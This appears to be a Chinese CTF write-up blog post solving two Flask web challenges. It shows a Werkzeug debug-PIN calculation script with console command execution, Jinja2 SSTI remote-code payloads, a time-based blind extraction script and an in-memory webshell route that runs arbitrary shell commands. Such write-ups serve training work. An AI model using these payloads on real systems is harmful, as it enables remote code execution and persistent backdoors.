shctf week3-web

[Week3] 顰

flask算pin

https://werkzeug.palletsprojects.com/en/3.0.x/debug/

debug console的请求需要来自信任的host

添加header Host:127.0.0.1:port

因为每个请求都要host

所以写一个demo抓包来获取提交pin验证的参数以及执行命令的参数

1
2
3
4
5
6
7
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return 'test'
if __name__ == "__main__":
app.run(host="0.0.0.0", port=8080, debug=True)

?__debugger__=yes&cmd=pinauth&pin=119-178-555&s=1aobhiUuRbIB9bPSOM2Z

(这串为SECRET = "1aobhiUuRbIB9bPSOM2Z";)看源码能找到

算pin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import hashlib
from itertools import chain

def mac_to_decimal(mac_address):
# 将 MAC 地址分割成十六进制对
hex_pairs = mac_address.split(':')

# 初始化十进制数值
decimal_value = 0

# 将每个十六进制对转换为十进制并累加
for hex_pair in hex_pairs:
decimal_value = (decimal_value << 8) + int(hex_pair, 16)

return decimal_value

mac_address = "42:a8:3c:60:79:d0" # /sys/class/net/eth0/address

# 调用函数将 MAC 地址转换为十进制数值
mac = str(mac_to_decimal(mac_address))

probably_public_bits = [
'root' # username 可通过/etc/passwd获取
'flask.app', # modname默认值
'Flask', # 默认值 getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.10/site-packages/flask/app.py' # 路径 可报错得到 getattr(mod, '__file__', None)
]

private_bits = [
mac, #mac地址十进制
'd45a88e1-3fe4-4156-9e59-3864587b7c87'
# /proc/sys/kernel/random/boot_id + /proc/self/cgroup (name=systemd:) /proc/self/cgroup为空不用看
]

# 下面为源码里面抄的,不需要修改
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num

print(rv)

获取cookie

__wzd7601fb13e6a573dccdb2=1729661381|c7574ed074d1

根据demo获取传命令的参数

/console?&__debugger__=yes&cmd=open('/flag').read()&frm=0&s=1aobhiUuRbIB9bPSOM2Z

[Week3] love_flask

看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
@app.route('/')
def pretty_input():
return render_template_string(html_template)

@app.route('/namelist', methods=['GET'])
def name_list():
name = request.args.get('name')
template = '<h1>Hi, %s.</h1>' % name
rendered_string = render_template_string(template)
if rendered_string:
return 'Success Write your name to database'
else:
return 'Error'

if __name__ == '__main__':
app.run(port=8080)

输入可控+渲染,明显ssti

但不同的是,没有return,也就是ssti的结果没有回显

可以看到没有任何的过滤

由于这里是格式化输入变量name,所以用不了条件或循环控制语句{% if %}``{% for %}

所以有2种办法

第一种

是盲注,因为渲染失败会返回500,所以可以根据返回状态码先爆出eval

/namelist?name={{().__class__.__base__.__subclasses__()[{{int(100-200)}}].__init__.__globals__['__builtins__']['eval']('__import__("time").sleep(3)')}}

接着通过构造延时来爆flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
import time
flag ='SHCTF{'
table = '-ABCDEFabcdef0123456789'
url = 'http://210.44.150.15:25528/namelist?name='
for len in range(7,43):
for i in table:
ii = flag +i
start_time = time.time()
data = "{{"+"().__class__.__base__.__subclasses__()[100].__init__.__globals__['__builtins__']['eval']('__import__(\"os\").popen(\"if [ $(head -c {} /flag) = {} ]; then sleep 2; fi\").read()')".format(len,ii) +"}}"
#print(data)
url1 = url + data
r = requests.get(url1)
end_time = time.time()
response_time = end_time - start_time
if response_time >= 2:
flag = flag +i
print(flag)
else:
continue
print(flag+'}')

第2种

内存马

https://xz.aliyun.com/t/10933?time__1311=CqjxRQiQqQqqlxGg6QGCDcmQD80rdDCbAeD

内存马无需上传文件也不生成文件。内存马通过动态注册一个路由来作为执行命令参数的入口。
{{url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})}}


shctf week3-web
http://example.com/2024/11/22/shctf week3/
作者
J_0k3r
发布于
2024年11月22日
许可协议
BY J_0K3R